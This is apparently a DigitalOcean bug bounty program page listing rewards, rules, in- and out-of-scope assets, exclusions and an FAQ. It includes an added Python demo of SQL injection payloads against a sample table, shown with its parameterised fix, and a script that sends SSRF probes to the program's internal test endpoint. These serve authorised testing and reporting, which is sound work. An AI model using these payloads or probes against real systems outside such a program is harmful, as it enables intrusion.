Description

DigitalOcean, LLC. is an American multinational technology company and cloud service provider. DigitalOcean simplifies cloud computing so developers and businesses can spend more time building software that changes the world.

Bounties

Severity      Score        Tier 2 (min - max)    Tier 3 (min - max)
Low           0.1 - 3.9    $100 - $450           $50 - $150
Medium        4.0 - 6.9    $700 - $1,500         $300 - $500
High          7.0 - 8.9    $2,000 - $4,000       $600 - $1,500
Critical      9.0 - 9.4    $5,000 - $8,000       $1,500 - $3,000
Exceptional   9.5 - 10.0   $8,000 - $10,000      $3,000 - $3,000

Tier 2: $100 - $10,000
Tier 3: $50 - $3,000
Rules of engagement

  • Required
  • Not applicable
  • Rate limit: max. 10 requests/sec
  • Identifying header: X-BBP-Researcher: {Username}

By participating in this program, you agree to:

  • Respect the Community Code of Conduct
  • Respect the Intigriti Terms and Conditions
  • Respect the scope of the program
  • Not discuss or disclose vulnerability information without prior written consent (including PoCs on YouTube and Vimeo)

Program Rules

  • While testing, please only test against your own accounts and resources. Targeting DigitalOcean users or their resources (e.g. Droplets, Spaces, Databases, etc.) is NOT allowed.
  • Do not host personal or commercial applications on servers underneath your @intigriti.me DigitalOcean account.
  • While testing, we encourage (but do not require) you to include a custom HTTP header in all your requests.
    • Providing such information will assist us with correlating your traffic to your research and expedite our ability to validate your report.
  • Please provide detailed reports with reproducible steps. If the report is not detailed enough to reproduce the issue, the issue will not be eligible for a bounty.
  • Multiple vulnerabilities caused by one underlying issue will be considered one issue.
  • When duplicates occur, we only award the first report that was received (provided that it can be fully reproduced).
  • Please help make a good faith effort to avoid privacy violations, destruction of data, or service degradation.

Validation times

We will validate all submissions within the below timelines, once your submission has been verified by Intigriti.

DigitalOcean will make a best effort to meet the following SLAs for hackers participating in our program.
The following SLAs are in business days (Mon-Fri) and may exclude days where there are regional holidays in the countries where our DigitalOcean staff are located.

Vulnerability severity   Time to validate
Exceptional              2 working days
Critical                 2 working days
High                     5 working days
Medium                   15 working days
Low                      15 working days

Between Dec 9, 2024 and Jan 2, 2025:

Vulnerability severity   Time to validate
Exceptional              3 working days
Critical                 3 working days
High                     14 working days
Medium                   To be reviewed after Jan 2
Low                      To be reviewed after Jan 2

We'll try to keep you informed about our progress throughout the process.

Check our fix
We offer up to $50 bonus to verify a resolved issue for us (when requested).
This remains at the discretion of DigitalOcean to award.

Domains

*.digitalocean.com (Tier 2, Wildcard)

Public IPs belonging to AS14061(DigitalOcean, LLC) are assigned to DigitalOcean customers and should be considered out of scope.

The following subdomains are out of scope:

  • cloudsupport.digitalocean.com
  • ideas.digitalocean.com
  • investor.digitalocean.com
  • investors.digitalocean.com
  • ir.digitalocean.com
  • deploy.digitalocean.com
  • pilot.digitalocean.com
  • rewards.digitalocean.com
  • anchor.digitalocean.com
  • waves.digitalocean.com
  • brand.digitalocean.com
  • go.digitalocean.com
  • groove.digitalocean.com
  • email.digitalocean.com
  • status.digitalocean.com
  • events.digitalocean.com
  • helpdesk.digitalocean.com
  • mirrors.digitalocean.com
  • segment.digitalocean.com
  • tracking.digitalocean.com

169.254.169.254 (Tier 2, IP Range)

Metadata service available at http://169.254.169.254/ from Droplets.

Findings against resources owned by your account should be filed underneath this asset.

  • While performing your research, please limit the scope of testing to only the accounts or resources that are owned by you.
  • If you discover a vulnerability that could allow you to bypass existing controls and gain access to other accounts, please do not take any further action against those accounts or data that are not owned by you.

https://github.com/digitalocean/do-agent (Tier 2, Other)

A daemon that helps collect system metrics from droplets.

https://github.com/digitalocean/doctl (Tier 2, Other)

The official command line interface for the DigitalOcean API.

https://github.com/digitalocean/droplet-agent (Tier 2, Other)

A daemon that enables web console access on Droplets.

https://github.com/digitalocean/go-nbd (Tier 2, Other)

Go-only network block device client.

https://github.com/digitalocean/terraform-provider-digitalocean (Tier 2, Other)

DigitalOcean's official Terraform provider.

Note that marketplace 1-click apps and add-ons are maintained by our partnered vendors and are out of scope. Security issues against these components of the marketplace are not in the scope of this program and ineligible for bounty rewards, but we are happy to help facilitate communications to the application owners.

Please reach out to us at security@digitalocean.com for facilitation.

SnapShooter, a cloud backup and recovery solution (Tier 3, URL)

Company shortlink service

API for hacktoberfest.com

https://github.com/digitalocean/do-markdownit (Tier 3, Other)

Markdown plugin run against all user-submitted content on https://digitalocean.com/community.

paperspace.com (URL)

We do not currently offer bounty rewards for findings related to the paperspace.com domain or associated sub-domains.

*.db.ondigitalocean.com (Out of scope, Wildcard)

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any database created inside your own account on this domain is considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.digitaloceanspaces.com (Out of scope, Wildcard)

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Spaces buckets created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.doserverless.co (Out of scope, Wildcard)

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Functions created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.k8s.ondigitalocean.com (Out of scope, Wildcard)

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Kubernetes clusters created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

*.ondigitalocean.app (Out of scope, Wildcard)

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any Apps created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

Assets created by other DigitalOcean customers (Out of scope, Other)

Any asset (Droplet, Space, or otherwise) created by another DigitalOcean customer is not to be tested under any circumstances.

Marketplace Apps and Add-Ons (Out of scope, Other)

The marketplace applications and add-ons are maintained by our partnered vendors. Security issues are not in the scope of this program and ineligible for bounty rewards, but we are happy to help facilitate communications to the application owners.
Please reach out to us at security@digitalocean.com for facilitation.

Other DigitalOcean open source projects not listed (Out of scope, Other)

All open source projects hosted by DigitalOcean not otherwise listed as in-scope are out-of-scope.

registry.digitalocean.com/* (Out of scope, Wildcard)

Customers' resources are hosted underneath this domain, so the entire domain should be considered out-of-scope.

Any container registries created inside your own account on this domain are considered in-scope. Use the cloud.digitalocean.com asset in that case.

In scope

Introduction
DigitalOcean is a cloud service provider offering infrastructure-as-a-service and platform-as-a-service solutions. DigitalOcean simplifies cloud computing so developers and businesses can spend more time building software that changes the world. At DigitalOcean, our customers’ trust is critical to us. We know that our customers need a secure foundation to build on, which is why we take security seriously. We look forward to working with the security community across the globe to find vulnerabilities in order to keep our customers and businesses safe. Please read the following content on how to best engage this program, stay within scope boundaries, and more.

Looking for other DigitalOcean assets? Take a look at our other bug bounty programs.

High Impact Findings
We are particularly interested in findings that enable widespread compromise of other customers or penetrate DigitalOcean’s core backend systems. These behaviors are not limited to specific vulnerability categories, but some examples include:

  • Broken authorization leading to access of other DigitalOcean customer records
  • Breaking out of process controls (e.g. access the hypervisor from your guest)
  • Remote code execution on core DigitalOcean infrastructure
  • Cross-VM attacks to break the multi-tenancy architecture

Acceptable PoCs

  • Command execution: whoami, hostname, uname
  • File reads: /etc/hostname
  • File writes: /tmp/bbp_<intigriti username>
  • SQL injection: basic evidence (' OR 1='1 causes all rows to return and ' AND 0='1 causes zero rows to return) is fine, but feel free to extract the username of the database user as well
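The two SQL injection probe values in the list above, run as an added example (not code from the DigitalOcean program or from any DigitalOcean system) against a constructed in-memory SQLite table, beside the parameterised query that makes the same values inert. The table, its rows and the `name` search parameter are invented for illustration. The probes are spelled '1'='1' and '0'='1' rather than the page's 1='1' because SQLite compares an integer literal with a text literal without coercion and would evaluate 1='1' as false; on databases that coerce the text literal to a number, both spellings behave the same, so check which form your target accepts before quoting row counts.

```python
import sqlite3

# Constructed sample table; it stands in for any application table and is not DigitalOcean data.
SAMPLE_USERS = [
    ("alice", "alice@example.test"),
    ("bob", "bob@example.test"),
    ("carol", "carol@example.test"),
]

# The two probe values from the "Acceptable PoCs" list, in the string-compare form so that
# the outcome does not depend on the database's integer/text coercion rules.
PAYLOAD_TRUE = "alice' OR '1'='1"
PAYLOAD_FALSE = "alice' AND '0'='1"


def open_db():
    """In-memory SQLite database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT NOT NULL, email TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, name):
    """String concatenation: a single quote in `name` closes the literal and the rest of the
    value is parsed as SQL. This is the defect the PoC demonstrates."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_fixed(conn, name):
    """Bound parameter: the driver passes the value out of band, so quotes in it stay data."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def row_counts(lookup, conn):
    """Row counts for the benign value and the two probe values: the three numbers a report
    should quote side by side (all rows for the true probe, zero rows for the false one)."""
    return {
        "benign": len(lookup(conn, "alice")),
        "always_true": len(lookup(conn, PAYLOAD_TRUE)),
        "always_false": len(lookup(conn, PAYLOAD_FALSE)),
    }


def demonstrate():
    conn = open_db()
    return {
        "vulnerable": row_counts(find_user_vulnerable, conn),  # {'benign': 1, 'always_true': 3, 'always_false': 0}
        "fixed": row_counts(find_user_fixed, conn),            # {'benign': 1, 'always_true': 0, 'always_false': 0}
    }


if __name__ == "__main__":
    for variant, counts in demonstrate().items():
        print(variant, counts)
```

The pair of counts (every row for the always-true probe, no rows for the always-false one, against a one-row baseline) is the "basic evidence" the list asks for; against the parameterised query both probes are matched as literal usernames and return nothing.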

DigitalOcean Products

Compute

  • Droplets - On-demand Linux virtual machines
  • Kubernetes - Managed Kubernetes service
  • App Platform - Platform-as-a-Service (PaaS) offering allowing users to build, deploy, and scale apps quickly while DigitalOcean manages the infrastructure, app runtime, and dependencies
  • Functions - Serverless computing solution to run on-demand code

Storage

Networking

  • Load Balancers - Fully-managed, highly available network load balancing service
  • Cloud Firewalls - Network-based, stateful firewall service for Droplets
  • Virtual Private Cloud (VPC) - Logically isolated private network interface for cloud resources in the same account
  • Reserved IPs - Publicly-accessible static IP addresses that can be assigned to a Droplet
  • Domains and DNS - DNS records managed from the DigitalOcean control panel, and can be integrated with Load Balancers and Spaces to streamline TLS certificate management
    • NOTE: DigitalOcean is not a domain name registrar
  • IPv6 - You can enable IPv6 on Droplets

Management Tools

  • Monitoring - Free, opt-in service that gathers metrics about Droplet-level resource utilization
  • Uptime - Monitoring service that checks the health of any URL or IP address

Accounts

  • Teams - Teams are our account boundary. Someone in one team cannot manage resources in another team they are not a member of.
  • SSH Keys - Manage SSH keys available to be provisioned onto Droplets
  • 2FA - Using two-factor authentication (2FA) on DigitalOcean adds an additional layer of security against unauthorized access to your account

Tools and Services

  • API - DigitalOcean's public REST API
  • Images
    • Backups - Automatically-created disk images for Droplets
    • Snapshots - On-demand disk images of Droplets and volumes saved to your account
    • Custom Images - Custom Linux or Unix-like images that you can import to DigitalOcean
  • doctl - The official command line interface for the DigitalOcean API
  • do-agent - A daemon that collects system metrics from Droplets
  • droplet-agent - A daemon that enables web console access on Droplets

Feedback
If you would like to help us improve our program or have feedback to share, please send your anonymous feedback here: Program feedback link
Please note that this form is checked periodically and should not be used for submissions or support queries.

Out of scope

Submissions targeting resources or accounts owned by other DigitalOcean customers are out of scope.

As a cloud provider, DigitalOcean owns a large IP space, and nearly every report we receive in which attribution is based solely on an IP address turns out to be an out-of-scope report on a customer. For example, assets (e.g. random public DigitalOcean IPs or Spaces buckets under the *.digitaloceanspaces.com domain) that Shodan or similar vulnerability scanners scan against are usually customers' assets; they are out of the scope of this program and should never be tested against. Public IPs belonging to AS14061 (DigitalOcean, LLC) are usually assigned to DigitalOcean customers.

Please do not submit findings from automated scans unless you have verified and have high confidence that the vulnerable targets are part of DigitalOcean’s public infrastructure and have a demonstrated security impact. Repetitive submissions against DigitalOcean customers may result in expulsion from our program.

Application-Specific Exclusions

  1. Third-Party Vulnerabilities:
    1.1 Use of known vulnerable libraries/software without working proof of exploitability or impact.
  2. Information Disclosure:
    2.1 Wordpress username disclosure.
    2.2 Verbose messages/files/directory listings without sensitive info.
    2.3 Banner grabbing/version disclosure.
  3. OAuth/Authentication Issues:
    3.1 Pre-auth account takeover/OAuth squatting.
  4. Low-Impact Client-Side Vulnerabilities:
    4.1 Self-XSS that cannot be used to exploit others.
  5. Cross-Origin Resource Sharing (CORS):
    5.1 CORS Misconfiguration on non-sensitive endpoints.
  6. Cookie and Security Headers:
    6.1 Missing cookie flags.
    6.2 Missing security headers.
  7. Cross-Site Request Forgery Issues:
    7.1 Low/no impact CSRF attacks.
  8. Rate Limiting:
    8.1 Bypassing rate-limits or the non-existence of rate-limits.
  9. Outdated Browsers:
    9.1 Vulnerabilities affecting users with outdated/unpatched browsers (more than two versions behind).
  10. File Upload Issues:
    10.1 Arbitrary file upload without proof of existence
  11. Server-Side Request Forgery (SSRF):
    11.1 Blind SSRF without proven business impact (e.g., pingbacks).
  12. Subdomain Issues:
    12.1 Subdomain takeover without actual takeover.
  13. Metadata Handling Issues:
    13.1 Not stripping metadata from files.
  14. Header Injection Vulnerabilities:
    14.1 Host header injection without proven business impact.
  15. Outdated Domains & Static Links:
    15.1 Links on static content referencing outdated third-party domains.
  16. Miscellaneous:
    16.1 Clickjacking without proven impact or unrealistic user interaction.
    16.2 Reverse tabnabbing.
    16.3 CSV injection.
    16.4 Autocomplete attribute on web forms.
    16.5 Non-invalidation of sessions (logout, enabling 2FA, etc.).
    16.6 Tokens leaked to third parties.
    16.7 Content injection without HTML modification.
    16.8 Email bombing.
    16.9 HTTP request smuggling with no proven impact.
    16.10 Homograph attacks.
    16.11 XMLRPC enabled.
    16.12 Anything related to email spoofing, SPF, DMARC or DKIM.

General Exclusions

  17. Publicly known processor side-channel attacks:
    17.1 This rule exists because there is no safe way to test without a special setup. If you have strong reason to believe that an issue may impact our environment, please contact us at security@digitalocean.com and we'll work with you to set up an environment for safe testing.
  18. Known vulnerabilities:
    18.1 If a reported vulnerability is already known through other means, it will be flagged as a duplicate.
  19. Theoretical issues:
    19.1 Security issues without realistic exploitation scenarios or requiring complex user interactions.
  20. Physical and social engineering attacks:
    20.1 Spam, social engineering, physical intrusion.
    20.2 Attacks needing physical access, man-in-the-middle, or compromised user accounts.
  21. Denial of service (DoS/DDoS):
    21.1 DoS/DDoS attacks or brute force attacks.
  22. Outdated software:
    22.1 Vulnerabilities in software that no longer receives security updates.
    22.2 Reports stating software is outdated/vulnerable without a proof of concept.
  23. Zero-day vulnerabilities:
    23.1 Newly discovered zero-days within 30 days of public patch release (reportable but not bounty eligible).
  24. Third-party sources of secrets, such as employee credentials:
    24.1 We do not award bounty rewards for the reporting of leaked secrets unless there is a specific vulnerability in our platform that led to the secrets' disclosure. If that is the case, please submit a report about that vulnerability instead.
    24.2 You may email us at security@digitalocean.com to inform us about leaked secrets in credential lists or public databases. While this will not be awarded a bounty payout, we appreciate good faith notices and will investigate your claim.

Severity assessment

DigitalOcean does not leverage CVSS for its severity assessment. Instead, we take a contextual look at impact and likelihood of a vulnerability and determine the commensurate risk to our business or customers between Informational, Low, Medium, High, or Critical. This means that you can be sure real, experienced security professionals are looking at all the details of your report to determine the severity and resulting bounty payment; you're not limited by what an algorithm dictates. When we triage issues, we will provide justification as to our severity decision if it differs from yours. Please note that our severity table ends at Critical. We will only consider Exceptional tier for truly monumental impact to the organization.

When deciding what severity to set on your report, you may use CVSS, CWSS, SSVC, EPSS, or any other combination of tools to help you determine an accurate threshold. Please do not mark every issue a Critical/High severity unless you have reasonable justification for doing so.

DigitalOcean will only issue monetary rewards for reports demonstrating meaningful impact. If DigitalOcean decides to offer a reward for a vulnerability report, the value of the reward will be based on the impact and severity of the reported vulnerability, to be determined by DigitalOcean in its sole discretion. Awards are granted entirely at the discretion of DigitalOcean.

For this reason, we strongly encourage researchers to spend extra time to provide a realistic attack/threat scenario adapted to our business. This will increase the chance of receiving a higher bounty.

At DigitalOcean's discretion, providing more complete research, proof-of-concept code, and detailed writeups may increase the bounty awarded. Conversely, DigitalOcean may pay less for vulnerabilities that require complex or over-complicated interactions for which the impact or security risk is negligible.

FAQ

How can I create an account?

You can self-register on the application, but please don’t forget to use your @intigriti.me email address.

  • Please create dedicated testing accounts for any DO security research engagement. This allows our teams to know if any anomalous activity is associated with Intigriti or potential bad actors.
  • Please register a DigitalOcean account using your Intigriti @intigriti.me email.
  • Feel free to sign up for new accounts on https://try.digitalocean.com/freetrialoffer/ to receive $200 in credits valid for 60 days (a valid credit card is still required to be linked to the account).
  • If you are testing with an account that does not use your Intigriti email address, we may take action against it for perceived malicious activity (account locks, bans, etc.)
  • Once you have finished testing, don’t forget to spin down resources to avoid any undue consumption.
  • Beyond the free trial offer, we will not provide credits or reimburse charges to researchers.

I think I found SSRF. How can I prove it?

We have set up an internal service you can try to hit to prove SSRF in our environment.
There are two endpoints you can try:

  • https://ssrf-sheriff.internal.digitalocean.com/
  • https://ssrf-sheriff.s2r1.internal.digitalocean.com/

Please include your Intigriti username in an X-BBP-Researcher header if you are able to control headers in your SSRF attempt.

If your SSRF request is successful, you will receive a unique code to include in your report as proof of your success.
If you discover blind SSRF, the endpoint will trigger an alert for our Security team to validate against. Please include timestamp and IP information when you write up your report.
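An added example, not DigitalOcean's or Intigriti's tooling, of carrying out the steps above with only the Python standard library: it places a sheriff URL into a suspected SSRF parameter, sends the X-BBP-Researcher header, and records the exact request, UTC timestamps and source IP that the write-up needs. The target URL, the `url` parameter, the researcher name and the 203.0.113.10 source address are placeholders; the sheriff's response format is not documented on this page, so the body is recorded verbatim rather than parsed for the code.

```python
import datetime as dt
import urllib.error
import urllib.parse
import urllib.request

# The two sheriff endpoints named in the FAQ and the header the program asks for.
SHERIFF_ENDPOINTS = (
    "https://ssrf-sheriff.internal.digitalocean.com/",
    "https://ssrf-sheriff.s2r1.internal.digitalocean.com/",
)
RESEARCHER_HEADER = "X-BBP-Researcher"


def build_probe(target_url, param, sheriff_url, researcher):
    """Put sheriff_url into query parameter `param` of target_url; return (url, headers).

    Other query parameters are preserved and any existing value of `param` is replaced.
    The sheriff URL is percent-encoded so its scheme, host and path reach the target's
    server-side fetch intact instead of being split by the target's query parser."""
    parts = urllib.parse.urlsplit(target_url)
    query = [(k, v) for k, v in urllib.parse.parse_qsl(parts.query, keep_blank_values=True)
             if k != param]
    query.append((param, sheriff_url))
    url = urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query)))
    # The header is sent to the target. It only reaches the sheriff if the target copies
    # request headers onto its outbound fetch, hence "if you are able to control headers".
    return url, {RESEARCHER_HEADER: researcher}


def run_probe(url, headers, timeout=15):
    """Live HTTP request (not exercised offline). Returns status, body and the UTC window."""
    started = dt.datetime.now(dt.timezone.utc)
    request = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            status, body = response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    return status, body, started, dt.datetime.now(dt.timezone.utc)


def evidence_block(url, headers, status, body, started, finished, source_ip):
    """Report-ready text: the exact request, the UTC window and the researcher's source IP
    (what the FAQ asks for when the SSRF is blind) and the target's response verbatim
    (which carries the sheriff's unique code when the SSRF is not blind)."""
    lines = ["SSRF probe", "request: GET " + url]
    lines += ["header: %s: %s" % (k, v) for k, v in headers.items()]
    lines += [
        "sent (UTC): " + started.isoformat(timespec="seconds"),
        "done (UTC): " + finished.isoformat(timespec="seconds"),
        "researcher source IP: " + source_ip,
        "target response: HTTP %d" % status,
        "target response body (verbatim, may contain the sheriff code):",
        body.strip() or "<empty>",
    ]
    return "\n".join(lines)


if __name__ == "__main__":
    # Hypothetical vulnerable endpoint and parameter; replace with the one under test.
    # 203.0.113.10 is a documentation-range placeholder for your own egress address.
    url, headers = build_probe("https://app.example.test/fetch?size=small", "url",
                               SHERIFF_ENDPOINTS[0], "your-intigriti-username")
    status, body, started, finished = run_probe(url, headers)
    print(evidence_block(url, headers, status, body, started, finished, "203.0.113.10"))
```

Run it once per sheriff endpoint and keep the printed block unchanged in the report; if the target never returns the sheriff's body, the timestamps and source IP in the block are what the security team will match against the alert on their side.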


Overall stats

  • Submissions received: 326
  • Accepted submissions: 65
  • Average payout: $1,117
  • Total payouts: $68,117

Last 90 day response times

  • Avg. time to first response: < 2 days
  • Avg. time to triage: < 3 days
  • Avg. time to decide: < 3 weeks
Activity

  • 12/11 saad0x created a submission
  • 12/10 DigitalOcean closed a submission
  • 12/10 DigitalOcean closed a submission
  • 12/10 dedsec_hacker created a submission
  • 12/10 DigitalOcean closed a submission
  • 12/10 DigitalOcean closed a submission
  • 12/10 saim333 created a submission
  • 12/9 emloshell created a submission
  • 12/9 codermak created a submission
  • 12/9 xzero created a submission